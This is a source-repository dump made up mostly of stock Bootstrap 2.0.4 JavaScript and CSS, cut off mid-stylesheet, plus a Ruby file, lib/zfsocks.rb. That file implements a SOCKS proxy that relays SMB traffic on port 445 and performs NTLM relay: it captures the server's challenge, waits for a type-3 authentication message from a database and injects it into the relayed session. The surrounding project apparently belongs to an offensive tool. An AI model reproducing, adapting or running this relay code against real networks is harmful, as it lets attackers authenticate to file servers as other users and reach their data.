$target.data('modal') ? 'toggle' : $.extend({}, $target.data(), $this.data()) 212 | 213 | e.preventDefault() 214 | $target.modal(option) 215 | }) 216 | }) 217 | 218 | }(window.jQuery); -------------------------------------------------------------------------------- /lib/zfsocks.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | #encoding: ASCII-8BIT 3 | require 'zfmoduletest' 4 | require 'zfntlm' 5 | require 'zfclient' 6 | require 'zfdb' 7 | require 'timeout' 8 | require 'base64' 9 | 10 | module ZFsocks 11 | class Server 12 | def initialize (ipaddr,port) 13 | begin 14 | @servers = TCPServer.open(ipaddr, port) 15 | return @servers 16 | rescue Errno::EADDRINUSE, Errno::EACCES 17 | puts "SOCKS - PORT IN USE OR PERMS" 18 | return false 19 | end 20 | end 21 | 22 | def Consuccess(cli) 23 | status = 0 24 | rip1,rip2,rip3,rip4 = @ip 25 | port = 12345 26 | resp = [@version,status,0,1,rip1,rip2,rip3,rip4,port].pack("CCCCCCCCn") 27 | cli.write resp 28 | end 29 | 30 | def Confailed(cli) 31 | status = 5 32 | rip1,rip2,rip3,rip4 = @ip 33 | resp = [@version,status,0,1,rip1,rip2,rip3,rip4,0].pack("CCCCCCCCn") 34 | cli.write resp 35 | cli.close 36 | end 37 | 38 | def start() 39 | puts "Initializing SOCKS Client Proxy" 40 | zfdb = ZFdb::DB.new 41 | @version = 5 42 | loop { 43 | Thread.start(@servers.accept) do |cli| 44 | begin 45 | #TODO parse auth 46 | puts "NEW SOCKS CONNECTION [ " + cli.peeraddr[3] + " ]" 47 | q,x = cli.recvfrom(3000) 48 | cli.write([5,0].pack("CC")) 49 | q,x = cli.recvfrom(3000) 50 | vers,cmd,resvd,iptype = q.unpack("CCCC") 51 | if iptype != 1 then puts "NOT IPV4 WTF OMG LOL" end 52 | rip1,rip2,rip3,rip4 = q[4,4].unpack("CCCC") 53 | @ip = q[4,4].unpack("CCCC") 54 | ip = @ip.join(".") 55 | port = q[8,2].unpack("n")[0] 56 | if port.to_i==80 then 57 | puts "80s" 58 | 59 | elsif port.to_i==443 then 60 | puts "oh god, ssl proxy here we go" 61 | 62 | elsif port.to_i==445 then 63 | begin 64 | TCPSocket.open(ip,445) do |relay| 65 | Consuccess(cli) 66 | type2 = nil 67 | threada= Thread.start { 68 | loop { 69 | begin 70 | q, x = cli.recvfrom(5000) 71 | if q.length == 0 then break end 72 | req = ZFsmb::Client.new(q) 73 | req.smbpid = "\xfe\xde" 74 | if (req.smbcmd == "\x73") then # SetupAndX / SPNEGO TIME! 75 | #puts "setupandx" 76 | 77 | ntlmreq = ZFsmb::Parsentlmfromspnego(req.bdata) 78 | ntlmmsg = ZFNtlm::Message.new(ntlmreq) 79 | 80 | if ntlmmsg.type == 1 then # if type 1 send type2 81 | # TODO pull type1 from db (and well...store type1s) 82 | oldtype1msgtemp = "\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 83 | type1msgtemp = "\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x01\x02\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 84 | ZFsmb::Smbclientntlmnego(relay, 1, type1msgtemp, "\x00\x00") 85 | 86 | elsif ntlmmsg.type == 3 then #if type 3 send OK 87 | #puts q[32..33].unpack("H*") 88 | ntlmmsg.parsetype3 89 | 90 | #puts "SMB user: " + ntlmmsg.domain + "\\" + ntlmmsg.username 91 | #puts "Passing type3" 92 | 93 | reqid = zfdb.AddApiReq(ntlmmsg.username,ntlmmsg.domain,type2) 94 | #puts "going to wait" 95 | begin 96 | type3msg = zfdb.WaitForApiResp(reqid,15)[0] 97 | #puts type3msg.inspect 98 | rescue 99 | puts $! 100 | end 101 | type3msg = Base64.decode64(type3msg) #removed gsub TODO fix gsub\n 102 | #puts "wait's over" 103 | ZFsmb::Smbclientntlmnego(relay, 3, type3msg, q[32..33]) 104 | # TODO: Fix above to dynamic userid 105 | else 106 | relay.write(req.getpacket) 107 | end 108 | elsif (req.smbcmd == "\x75") then # TreeConnectAndX 109 | 110 | #puts "treeconnectandx" 111 | #TODO: update path! 112 | #puts q[/(\x5c\x00\x5c\x00.*\x00\x00)/] # lazy detection of file share 113 | relay.write(req.getpacket) 114 | else 115 | q[30..31] = "\xfe\xde" 116 | #q[28..29] = "\x00\x00" 117 | q[14..15] = "\x01\xc8" 118 | relay.write(q) 119 | end 120 | rescue 121 | puts $! 122 | puts "broken" 123 | end 124 | } 125 | } 126 | 127 | loop { 128 | begin 129 | q2,x2 = relay.recvfrom(5000) 130 | req2 = ZFsmb::Client.new(q2) 131 | if (req2.smbcmd == "\x73") then # SetupAndX / SPNEGO TIME! 132 | ntlmreq = ZFsmb::Parsentlmfromspnego(req2.bdata) 133 | 134 | ntlmmsg = ZFNtlm::Message.new(ntlmreq) 135 | if ntlmmsg.type == 2 then 136 | type2 = Base64.encode64(ntlmreq) #TODO fix gsub issue. temp removed 137 | end 138 | #puts "relay in" 139 | cli.write(q2) 140 | else 141 | cli.write(q2) 142 | end 143 | rescue 144 | puts "woof" 145 | puts $! 146 | #puts "rescue" 147 | threada.kill 148 | break 149 | end 150 | } 151 | 152 | end 153 | rescue Errno::ENETUNREACH, Errno::EHOSTUNREACH 154 | Confailed(cli) 155 | 156 | rescue 157 | puts "other fail" 158 | puts $!.inspect 159 | end 160 | elsif port==139 then 161 | Confailed(cli) 162 | else 163 | puts "yar" 164 | end 165 | 166 | rescue 167 | puts $! end 168 | end 169 | } 170 | end 171 | end 172 | 173 | end -------------------------------------------------------------------------------- /bootstrap/js/bootstrap-typeahead.js: -------------------------------------------------------------------------------- 1 | /* ============================================================= 2 | * bootstrap-typeahead.js v2.0.4 3 | * http://twitter.github.com/bootstrap/javascript.html#typeahead 4 | * ============================================================= 5 | * Copyright 2012 Twitter, Inc. 6 | * 7 | * Licensed under the Apache License, Version 2.0 (the "License"); 8 | * you may not use this file except in compliance with the License. 9 | * You may obtain a copy of the License at 10 | * 11 | * http://www.apache.org/licenses/LICENSE-2.0 12 | * 13 | * Unless required by applicable law or agreed to in writing, software 14 | * distributed under the License is distributed on an "AS IS" BASIS, 15 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 16 | * See the License for the specific language governing permissions and 17 | * limitations under the License. 18 | * ============================================================ */ 19 | 20 | 21 | !function($){ 22 | 23 | "use strict"; // jshint ;_; 24 | 25 | 26 | /* TYPEAHEAD PUBLIC CLASS DEFINITION 27 | * ================================= */ 28 | 29 | var Typeahead = function (element, options) { 30 | this.$element = $(element) 31 | this.options = $.extend({}, $.fn.typeahead.defaults, options) 32 | this.matcher = this.options.matcher || this.matcher 33 | this.sorter = this.options.sorter || this.sorter 34 | this.highlighter = this.options.highlighter || this.highlighter 35 | this.updater = this.options.updater || this.updater 36 | this.$menu = $(this.options.menu).appendTo('body') 37 | this.source = this.options.source 38 | this.shown = false 39 | this.listen() 40 | } 41 | 42 | Typeahead.prototype = { 43 | 44 | constructor: Typeahead 45 | 46 | , select: function () { 47 | var val = this.$menu.find('.active').attr('data-value') 48 | this.$element 49 | .val(this.updater(val)) 50 | .change() 51 | return this.hide() 52 | } 53 | 54 | , updater: function (item) { 55 | return item 56 | } 57 | 58 | , show: function () { 59 | var pos = $.extend({}, this.$element.offset(), { 60 | height: this.$element[0].offsetHeight 61 | }) 62 | 63 | this.$menu.css({ 64 | top: pos.top + pos.height 65 | , left: pos.left 66 | }) 67 | 68 | this.$menu.show() 69 | this.shown = true 70 | return this 71 | } 72 | 73 | , hide: function () { 74 | this.$menu.hide() 75 | this.shown = false 76 | return this 77 | } 78 | 79 | , lookup: function (event) { 80 | var that = this 81 | , items 82 | , q 83 | 84 | this.query = this.$element.val() 85 | 86 | if (!this.query) { 87 | return this.shown ? this.hide() : this 88 | } 89 | 90 | items = $.grep(this.source, function (item) { 91 | return that.matcher(item) 92 | }) 93 | 94 | items = this.sorter(items) 95 | 96 | if (!items.length) { 97 | return this.shown ? this.hide() : this 98 | } 99 | 100 | return this.render(items.slice(0, this.options.items)).show() 101 | } 102 | 103 | , matcher: function (item) { 104 | return ~item.toLowerCase().indexOf(this.query.toLowerCase()) 105 | } 106 | 107 | , sorter: function (items) { 108 | var beginswith = [] 109 | , caseSensitive = [] 110 | , caseInsensitive = [] 111 | , item 112 | 113 | while (item = items.shift()) { 114 | if (!item.toLowerCase().indexOf(this.query.toLowerCase())) beginswith.push(item) 115 | else if (~item.indexOf(this.query)) caseSensitive.push(item) 116 | else caseInsensitive.push(item) 117 | } 118 | 119 | return beginswith.concat(caseSensitive, caseInsensitive) 120 | } 121 | 122 | , highlighter: function (item) { 123 | var query = this.query.replace(/[\-\[\]{}()*+?.,\\\^$|#\s]/g, '\\$&') 124 | return item.replace(new RegExp('(' + query + ')', 'ig'), function ($1, match) { 125 | return '' + match + '' 126 | }) 127 | } 128 | 129 | , render: function (items) { 130 | var that = this 131 | 132 | items = $(items).map(function (i, item) { 133 | i = $(that.options.item).attr('data-value', item) 134 | i.find('a').html(that.highlighter(item)) 135 | return i[0] 136 | }) 137 | 138 | items.first().addClass('active') 139 | this.$menu.html(items) 140 | return this 141 | } 142 | 143 | , next: function (event) { 144 | var active = this.$menu.find('.active').removeClass('active') 145 | , next = active.next() 146 | 147 | if (!next.length) { 148 | next = $(this.$menu.find('li')[0]) 149 | } 150 | 151 | next.addClass('active') 152 | } 153 | 154 | , prev: function (event) { 155 | var active = this.$menu.find('.active').removeClass('active') 156 | , prev = active.prev() 157 | 158 | if (!prev.length) { 159 | prev = this.$menu.find('li').last() 160 | } 161 | 162 | prev.addClass('active') 163 | } 164 | 165 | , listen: function () { 166 | this.$element 167 | .on('blur', $.proxy(this.blur, this)) 168 | .on('keypress', $.proxy(this.keypress, this)) 169 | .on('keyup', $.proxy(this.keyup, this)) 170 | 171 | if ($.browser.webkit || $.browser.msie) { 172 | this.$element.on('keydown', $.proxy(this.keypress, this)) 173 | } 174 | 175 | this.$menu 176 | .on('click', $.proxy(this.click, this)) 177 | .on('mouseenter', 'li', $.proxy(this.mouseenter, this)) 178 | } 179 | 180 | , keyup: function (e) { 181 | switch(e.keyCode) { 182 | case 40: // down arrow 183 | case 38: // up arrow 184 | break 185 | 186 | case 9: // tab 187 | case 13: // enter 188 | if (!this.shown) return 189 | this.select() 190 | break 191 | 192 | case 27: // escape 193 | if (!this.shown) return 194 | this.hide() 195 | break 196 | 197 | default: 198 | this.lookup() 199 | } 200 | 201 | e.stopPropagation() 202 | e.preventDefault() 203 | } 204 | 205 | , keypress: function (e) { 206 | if (!this.shown) return 207 | 208 | switch(e.keyCode) { 209 | case 9: // tab 210 | case 13: // enter 211 | case 27: // escape 212 | e.preventDefault() 213 | break 214 | 215 | case 38: // up arrow 216 | if (e.type != 'keydown') break 217 | e.preventDefault() 218 | this.prev() 219 | break 220 | 221 | case 40: // down arrow 222 | if (e.type != 'keydown') break 223 | e.preventDefault() 224 | this.next() 225 | break 226 | } 227 | 228 | e.stopPropagation() 229 | } 230 | 231 | , blur: function (e) { 232 | var that = this 233 | setTimeout(function () { that.hide() }, 150) 234 | } 235 | 236 | , click: function (e) { 237 | e.stopPropagation() 238 | e.preventDefault() 239 | this.select() 240 | } 241 | 242 | , mouseenter: function (e) { 243 | this.$menu.find('.active').removeClass('active') 244 | $(e.currentTarget).addClass('active') 245 | } 246 | 247 | } 248 | 249 | 250 | /* TYPEAHEAD PLUGIN DEFINITION 251 | * =========================== */ 252 | 253 | $.fn.typeahead = function (option) { 254 | return this.each(function () { 255 | var $this = $(this) 256 | , data = $this.data('typeahead') 257 | , options = typeof option == 'object' && option 258 | if (!data) $this.data('typeahead', (data = new Typeahead(this, options))) 259 | if (typeof option == 'string') data[option]() 260 | }) 261 | } 262 | 263 | $.fn.typeahead.defaults = { 264 | source: [] 265 | , items: 8 266 | , menu: '
    ' 267 | , item: '
    • ' 268 | } 269 | 270 | $.fn.typeahead.Constructor = Typeahead 271 | 272 | 273 | /* TYPEAHEAD DATA-API 274 | * ================== */ 275 | 276 | $(function () { 277 | $('body').on('focus.typeahead.data-api', '[data-provide="typeahead"]', function (e) { 278 | var $this = $(this) 279 | if ($this.data('typeahead')) return 280 | e.preventDefault() 281 | $this.typeahead($this.data()) 282 | }) 283 | }) 284 | 285 | }(window.jQuery); -------------------------------------------------------------------------------- /bootstrap/js/bootstrap-tooltip.js: -------------------------------------------------------------------------------- 1 | /* =========================================================== 2 | * bootstrap-tooltip.js v2.0.4 3 | * http://twitter.github.com/bootstrap/javascript.html#tooltips 4 | * Inspired by the original jQuery.tipsy by Jason Frame 5 | * =========================================================== 6 | * Copyright 2012 Twitter, Inc. 7 | * 8 | * Licensed under the Apache License, Version 2.0 (the "License"); 9 | * you may not use this file except in compliance with the License. 10 | * You may obtain a copy of the License at 11 | * 12 | * http://www.apache.org/licenses/LICENSE-2.0 13 | * 14 | * Unless required by applicable law or agreed to in writing, software 15 | * distributed under the License is distributed on an "AS IS" BASIS, 16 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 17 | * See the License for the specific language governing permissions and 18 | * limitations under the License. 19 | * ========================================================== */ 20 | 21 | 22 | !function ($) { 23 | 24 | "use strict"; // jshint ;_; 25 | 26 | 27 | /* TOOLTIP PUBLIC CLASS DEFINITION 28 | * =============================== */ 29 | 30 | var Tooltip = function (element, options) { 31 | this.init('tooltip', element, options) 32 | } 33 | 34 | Tooltip.prototype = { 35 | 36 | constructor: Tooltip 37 | 38 | , init: function (type, element, options) { 39 | var eventIn 40 | , eventOut 41 | 42 | this.type = type 43 | this.$element = $(element) 44 | this.options = this.getOptions(options) 45 | this.enabled = true 46 | 47 | if (this.options.trigger != 'manual') { 48 | eventIn = this.options.trigger == 'hover' ? 'mouseenter' : 'focus' 49 | eventOut = this.options.trigger == 'hover' ? 'mouseleave' : 'blur' 50 | this.$element.on(eventIn, this.options.selector, $.proxy(this.enter, this)) 51 | this.$element.on(eventOut, this.options.selector, $.proxy(this.leave, this)) 52 | } 53 | 54 | this.options.selector ? 55 | (this._options = $.extend({}, this.options, { trigger: 'manual', selector: '' })) : 56 | this.fixTitle() 57 | } 58 | 59 | , getOptions: function (options) { 60 | options = $.extend({}, $.fn[this.type].defaults, options, this.$element.data()) 61 | 62 | if (options.delay && typeof options.delay == 'number') { 63 | options.delay = { 64 | show: options.delay 65 | , hide: options.delay 66 | } 67 | } 68 | 69 | return options 70 | } 71 | 72 | , enter: function (e) { 73 | var self = $(e.currentTarget)[this.type](this._options).data(this.type) 74 | 75 | if (!self.options.delay || !self.options.delay.show) return self.show() 76 | 77 | clearTimeout(this.timeout) 78 | self.hoverState = 'in' 79 | this.timeout = setTimeout(function() { 80 | if (self.hoverState == 'in') self.show() 81 | }, self.options.delay.show) 82 | } 83 | 84 | , leave: function (e) { 85 | var self = $(e.currentTarget)[this.type](this._options).data(this.type) 86 | 87 | if (this.timeout) clearTimeout(this.timeout) 88 | if (!self.options.delay || !self.options.delay.hide) return self.hide() 89 | 90 | self.hoverState = 'out' 91 | this.timeout = setTimeout(function() { 92 | if (self.hoverState == 'out') self.hide() 93 | }, self.options.delay.hide) 94 | } 95 | 96 | , show: function () { 97 | var $tip 98 | , inside 99 | , pos 100 | , actualWidth 101 | , actualHeight 102 | , placement 103 | , tp 104 | 105 | if (this.hasContent() && this.enabled) { 106 | $tip = this.tip() 107 | this.setContent() 108 | 109 | if (this.options.animation) { 110 | $tip.addClass('fade') 111 | } 112 | 113 | placement = typeof this.options.placement == 'function' ? 114 | this.options.placement.call(this, $tip[0], this.$element[0]) : 115 | this.options.placement 116 | 117 | inside = /in/.test(placement) 118 | 119 | $tip 120 | .remove() 121 | .css({ top: 0, left: 0, display: 'block' }) 122 | .appendTo(inside ? this.$element : document.body) 123 | 124 | pos = this.getPosition(inside) 125 | 126 | actualWidth = $tip[0].offsetWidth 127 | actualHeight = $tip[0].offsetHeight 128 | 129 | switch (inside ? placement.split(' ')[1] : placement) { 130 | case 'bottom': 131 | tp = {top: pos.top + pos.height, left: pos.left + pos.width / 2 - actualWidth / 2} 132 | break 133 | case 'top': 134 | tp = {top: pos.top - actualHeight, left: pos.left + pos.width / 2 - actualWidth / 2} 135 | break 136 | case 'left': 137 | tp = {top: pos.top + pos.height / 2 - actualHeight / 2, left: pos.left - actualWidth} 138 | break 139 | case 'right': 140 | tp = {top: pos.top + pos.height / 2 - actualHeight / 2, left: pos.left + pos.width} 141 | break 142 | } 143 | 144 | $tip 145 | .css(tp) 146 | .addClass(placement) 147 | .addClass('in') 148 | } 149 | } 150 | 151 | , isHTML: function(text) { 152 | // html string detection logic adapted from jQuery 153 | return typeof text != 'string' 154 | || ( text.charAt(0) === "<" 155 | && text.charAt( text.length - 1 ) === ">" 156 | && text.length >= 3 157 | ) || /^(?:[^<]*<[\w\W]+>[^>]*$)/.exec(text) 158 | } 159 | 160 | , setContent: function () { 161 | var $tip = this.tip() 162 | , title = this.getTitle() 163 | 164 | $tip.find('.tooltip-inner')[this.isHTML(title) ? 'html' : 'text'](title) 165 | $tip.removeClass('fade in top bottom left right') 166 | } 167 | 168 | , hide: function () { 169 | var that = this 170 | , $tip = this.tip() 171 | 172 | $tip.removeClass('in') 173 | 174 | function removeWithAnimation() { 175 | var timeout = setTimeout(function () { 176 | $tip.off($.support.transition.end).remove() 177 | }, 500) 178 | 179 | $tip.one($.support.transition.end, function () { 180 | clearTimeout(timeout) 181 | $tip.remove() 182 | }) 183 | } 184 | 185 | $.support.transition && this.$tip.hasClass('fade') ? 186 | removeWithAnimation() : 187 | $tip.remove() 188 | } 189 | 190 | , fixTitle: function () { 191 | var $e = this.$element 192 | if ($e.attr('title') || typeof($e.attr('data-original-title')) != 'string') { 193 | $e.attr('data-original-title', $e.attr('title') || '').removeAttr('title') 194 | } 195 | } 196 | 197 | , hasContent: function () { 198 | return this.getTitle() 199 | } 200 | 201 | , getPosition: function (inside) { 202 | return $.extend({}, (inside ? {top: 0, left: 0} : this.$element.offset()), { 203 | width: this.$element[0].offsetWidth 204 | , height: this.$element[0].offsetHeight 205 | }) 206 | } 207 | 208 | , getTitle: function () { 209 | var title 210 | , $e = this.$element 211 | , o = this.options 212 | 213 | title = $e.attr('data-original-title') 214 | || (typeof o.title == 'function' ? o.title.call($e[0]) : o.title) 215 | 216 | return title 217 | } 218 | 219 | , tip: function () { 220 | return this.$tip = this.$tip || $(this.options.template) 221 | } 222 | 223 | , validate: function () { 224 | if (!this.$element[0].parentNode) { 225 | this.hide() 226 | this.$element = null 227 | this.options = null 228 | } 229 | } 230 | 231 | , enable: function () { 232 | this.enabled = true 233 | } 234 | 235 | , disable: function () { 236 | this.enabled = false 237 | } 238 | 239 | , toggleEnabled: function () { 240 | this.enabled = !this.enabled 241 | } 242 | 243 | , toggle: function () { 244 | this[this.tip().hasClass('in') ? 'hide' : 'show']() 245 | } 246 | 247 | } 248 | 249 | 250 | /* TOOLTIP PLUGIN DEFINITION 251 | * ========================= */ 252 | 253 | $.fn.tooltip = function ( option ) { 254 | return this.each(function () { 255 | var $this = $(this) 256 | , data = $this.data('tooltip') 257 | , options = typeof option == 'object' && option 258 | if (!data) $this.data('tooltip', (data = new Tooltip(this, options))) 259 | if (typeof option == 'string') data[option]() 260 | }) 261 | } 262 | 263 | $.fn.tooltip.Constructor = Tooltip 264 | 265 | $.fn.tooltip.defaults = { 266 | animation: true 267 | , placement: 'top' 268 | , selector: false 269 | , template: '
    ' 270 | , trigger: 'hover' 271 | , title: '' 272 | , delay: 0 273 | } 274 | 275 | }(window.jQuery); 276 | -------------------------------------------------------------------------------- /bootstrap/css/bootstrap-responsive.min.css: -------------------------------------------------------------------------------- 1 | /*! 2 | * Bootstrap Responsive v2.0.4 3 | * 4 | * Copyright 2012 Twitter, Inc 5 | * Licensed under the Apache License v2.0 6 | * http://www.apache.org/licenses/LICENSE-2.0 7 | * 8 | * Designed and built with all the love in the world @twitter by @mdo and @fat. 9 | */.clearfix{*zoom:1}.clearfix:before,.clearfix:after{display:table;content:""}.clearfix:after{clear:both}.hide-text{font:0/0 a;color:transparent;text-shadow:none;background-color:transparent;border:0}.input-block-level{display:block;width:100%;min-height:28px;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;-ms-box-sizing:border-box;box-sizing:border-box}.hidden{display:none;visibility:hidden}.visible-phone{display:none!important}.visible-tablet{display:none!important}.hidden-desktop{display:none!important}@media(max-width:767px){.visible-phone{display:inherit!important}.hidden-phone{display:none!important}.hidden-desktop{display:inherit!important}.visible-desktop{display:none!important}}@media(min-width:768px) and (max-width:979px){.visible-tablet{display:inherit!important}.hidden-tablet{display:none!important}.hidden-desktop{display:inherit!important}.visible-desktop{display:none!important}}@media(max-width:480px){.nav-collapse{-webkit-transform:translate3d(0,0,0)}.page-header h1 small{display:block;line-height:18px}input[type="checkbox"],input[type="radio"]{border:1px solid #ccc}.form-horizontal .control-group>label{float:none;width:auto;padding-top:0;text-align:left}.form-horizontal .controls{margin-left:0}.form-horizontal .control-list{padding-top:0}.form-horizontal .form-actions{padding-right:10px;padding-left:10px}.modal{position:absolute;top:10px;right:10px;left:10px;width:auto;margin:0}.modal.fade.in{top:auto}.modal-header .close{padding:10px;margin:-10px}.carousel-caption{position:static}}@media(max-width:767px){body{padding-right:20px;padding-left:20px}.navbar-fixed-top,.navbar-fixed-bottom{margin-right:-20px;margin-left:-20px}.container-fluid{padding:0}.dl-horizontal dt{float:none;width:auto;clear:none;text-align:left}.dl-horizontal dd{margin-left:0}.container{width:auto}.row-fluid{width:100%}.row,.thumbnails{margin-left:0}[class*="span"],.row-fluid [class*="span"]{display:block;float:none;width:auto;margin-left:0}.input-large,.input-xlarge,.input-xxlarge,input[class*="span"],select[class*="span"],textarea[class*="span"],.uneditable-input{display:block;width:100%;min-height:28px;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;-ms-box-sizing:border-box;box-sizing:border-box}.input-prepend input,.input-append input,.input-prepend input[class*="span"],.input-append input[class*="span"]{display:inline-block;width:auto}}@media(min-width:768px) and (max-width:979px){.row{margin-left:-20px;*zoom:1}.row:before,.row:after{display:table;content:""}.row:after{clear:both}[class*="span"]{float:left;margin-left:20px}.container,.navbar-fixed-top .container,.navbar-fixed-bottom .container{width:724px}.span12{width:724px}.span11{width:662px}.span10{width:600px}.span9{width:538px}.span8{width:476px}.span7{width:414px}.span6{width:352px}.span5{width:290px}.span4{width:228px}.span3{width:166px}.span2{width:104px}.span1{width:42px}.offset12{margin-left:764px}.offset11{margin-left:702px}.offset10{margin-left:640px}.offset9{margin-left:578px}.offset8{margin-left:516px}.offset7{margin-left:454px}.offset6{margin-left:392px}.offset5{margin-left:330px}.offset4{margin-left:268px}.offset3{margin-left:206px}.offset2{margin-left:144px}.offset1{margin-left:82px}.row-fluid{width:100%;*zoom:1}.row-fluid:before,.row-fluid:after{display:table;content:""}.row-fluid:after{clear:both}.row-fluid [class*="span"]{display:block;float:left;width:100%;min-height:28px;margin-left:2.762430939%;*margin-left:2.709239449638298%;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;-ms-box-sizing:border-box;box-sizing:border-box}.row-fluid [class*="span"]:first-child{margin-left:0}.row-fluid .span12{width:99.999999993%;*width:99.9468085036383%}.row-fluid .span11{width:91.436464082%;*width:91.38327259263829%}.row-fluid .span10{width:82.87292817100001%;*width:82.8197366816383%}.row-fluid .span9{width:74.30939226%;*width:74.25620077063829%}.row-fluid .span8{width:65.74585634900001%;*width:65.6926648596383%}.row-fluid .span7{width:57.182320438000005%;*width:57.129128948638304%}.row-fluid .span6{width:48.618784527%;*width:48.5655930376383%}.row-fluid .span5{width:40.055248616%;*width:40.0020571266383%}.row-fluid .span4{width:31.491712705%;*width:31.4385212156383%}.row-fluid .span3{width:22.928176794%;*width:22.874985304638297%}.row-fluid .span2{width:14.364640883%;*width:14.311449393638298%}.row-fluid .span1{width:5.801104972%;*width:5.747913482638298%}input,textarea,.uneditable-input{margin-left:0}input.span12,textarea.span12,.uneditable-input.span12{width:714px}input.span11,textarea.span11,.uneditable-input.span11{width:652px}input.span10,textarea.span10,.uneditable-input.span10{width:590px}input.span9,textarea.span9,.uneditable-input.span9{width:528px}input.span8,textarea.span8,.uneditable-input.span8{width:466px}input.span7,textarea.span7,.uneditable-input.span7{width:404px}input.span6,textarea.span6,.uneditable-input.span6{width:342px}input.span5,textarea.span5,.uneditable-input.span5{width:280px}input.span4,textarea.span4,.uneditable-input.span4{width:218px}input.span3,textarea.span3,.uneditable-input.span3{width:156px}input.span2,textarea.span2,.uneditable-input.span2{width:94px}input.span1,textarea.span1,.uneditable-input.span1{width:32px}}@media(min-width:1200px){.row{margin-left:-30px;*zoom:1}.row:before,.row:after{display:table;content:""}.row:after{clear:both}[class*="span"]{float:left;margin-left:30px}.container,.navbar-fixed-top .container,.navbar-fixed-bottom .container{width:1170px}.span12{width:1170px}.span11{width:1070px}.span10{width:970px}.span9{width:870px}.span8{width:770px}.span7{width:670px}.span6{width:570px}.span5{width:470px}.span4{width:370px}.span3{width:270px}.span2{width:170px}.span1{width:70px}.offset12{margin-left:1230px}.offset11{margin-left:1130px}.offset10{margin-left:1030px}.offset9{margin-left:930px}.offset8{margin-left:830px}.offset7{margin-left:730px}.offset6{margin-left:630px}.offset5{margin-left:530px}.offset4{margin-left:430px}.offset3{margin-left:330px}.offset2{margin-left:230px}.offset1{margin-left:130px}.row-fluid{width:100%;*zoom:1}.row-fluid:before,.row-fluid:after{display:table;content:""}.row-fluid:after{clear:both}.row-fluid [class*="span"]{display:block;float:left;width:100%;min-height:28px;margin-left:2.564102564%;*margin-left:2.510911074638298%;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;-ms-box-sizing:border-box;box-sizing:border-box}.row-fluid [class*="span"]:first-child{margin-left:0}.row-fluid .span12{width:100%;*width:99.94680851063829%}.row-fluid .span11{width:91.45299145300001%;*width:91.3997999636383%}.row-fluid .span10{width:82.905982906%;*width:82.8527914166383%}.row-fluid .span9{width:74.358974359%;*width:74.30578286963829%}.row-fluid .span8{width:65.81196581200001%;*width:65.7587743226383%}.row-fluid .span7{width:57.264957265%;*width:57.2117657756383%}.row-fluid .span6{width:48.717948718%;*width:48.6647572286383%}.row-fluid .span5{width:40.170940171000005%;*width:40.117748681638304%}.row-fluid .span4{width:31.623931624%;*width:31.5707401346383%}.row-fluid .span3{width:23.076923077%;*width:23.0237315876383%}.row-fluid .span2{width:14.529914530000001%;*width:14.4767230406383%}.row-fluid .span1{width:5.982905983%;*width:5.929714493638298%}input,textarea,.uneditable-input{margin-left:0}input.span12,textarea.span12,.uneditable-input.span12{width:1160px}input.span11,textarea.span11,.uneditable-input.span11{width:1060px}input.span10,textarea.span10,.uneditable-input.span10{width:960px}input.span9,textarea.span9,.uneditable-input.span9{width:860px}input.span8,textarea.span8,.uneditable-input.span8{width:760px}input.span7,textarea.span7,.uneditable-input.span7{width:660px}input.span6,textarea.span6,.uneditable-input.span6{width:560px}input.span5,textarea.span5,.uneditable-input.span5{width:460px}input.span4,textarea.span4,.uneditable-input.span4{width:360px}input.span3,textarea.span3,.uneditable-input.span3{width:260px}input.span2,textarea.span2,.uneditable-input.span2{width:160px}input.span1,textarea.span1,.uneditable-input.span1{width:60px}.thumbnails{margin-left:-30px}.thumbnails>li{margin-left:30px}.row-fluid .thumbnails{margin-left:0}}@media(max-width:979px){body{padding-top:0}.navbar-fixed-top,.navbar-fixed-bottom{position:static}.navbar-fixed-top{margin-bottom:18px}.navbar-fixed-bottom{margin-top:18px}.navbar-fixed-top .navbar-inner,.navbar-fixed-bottom .navbar-inner{padding:5px}.navbar .container{width:auto;padding:0}.navbar .brand{padding-right:10px;padding-left:10px;margin:0 0 0 -5px}.nav-collapse{clear:both}.nav-collapse .nav{float:none;margin:0 0 9px}.nav-collapse .nav>li{float:none}.nav-collapse .nav>li>a{margin-bottom:2px}.nav-collapse .nav>.divider-vertical{display:none}.nav-collapse .nav .nav-header{color:#999;text-shadow:none}.nav-collapse .nav>li>a,.nav-collapse .dropdown-menu a{padding:6px 15px;font-weight:bold;color:#999;-webkit-border-radius:3px;-moz-border-radius:3px;border-radius:3px}.nav-collapse .btn{padding:4px 10px 4px;font-weight:normal;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px}.nav-collapse .dropdown-menu li+li a{margin-bottom:2px}.nav-collapse .nav>li>a:hover,.nav-collapse .dropdown-menu a:hover{background-color:#222}.nav-collapse.in .btn-group{padding:0;margin-top:5px}.nav-collapse .dropdown-menu{position:static;top:auto;left:auto;display:block;float:none;max-width:none;padding:0;margin:0 15px;background-color:transparent;border:0;-webkit-border-radius:0;-moz-border-radius:0;border-radius:0;-webkit-box-shadow:none;-moz-box-shadow:none;box-shadow:none}.nav-collapse .dropdown-menu:before,.nav-collapse .dropdown-menu:after{display:none}.nav-collapse .dropdown-menu .divider{display:none}.nav-collapse .navbar-form,.nav-collapse .navbar-search{float:none;padding:9px 15px;margin:9px 0;border-top:1px solid #222;border-bottom:1px solid #222;-webkit-box-shadow:inset 0 1px 0 rgba(255,255,255,0.1),0 1px 0 rgba(255,255,255,0.1);-moz-box-shadow:inset 0 1px 0 rgba(255,255,255,0.1),0 1px 0 rgba(255,255,255,0.1);box-shadow:inset 0 1px 0 rgba(255,255,255,0.1),0 1px 0 rgba(255,255,255,0.1)}.navbar .nav-collapse .nav.pull-right{float:none;margin-left:0}.nav-collapse,.nav-collapse.collapse{height:0;overflow:hidden}.navbar .btn-navbar{display:block}.navbar-static 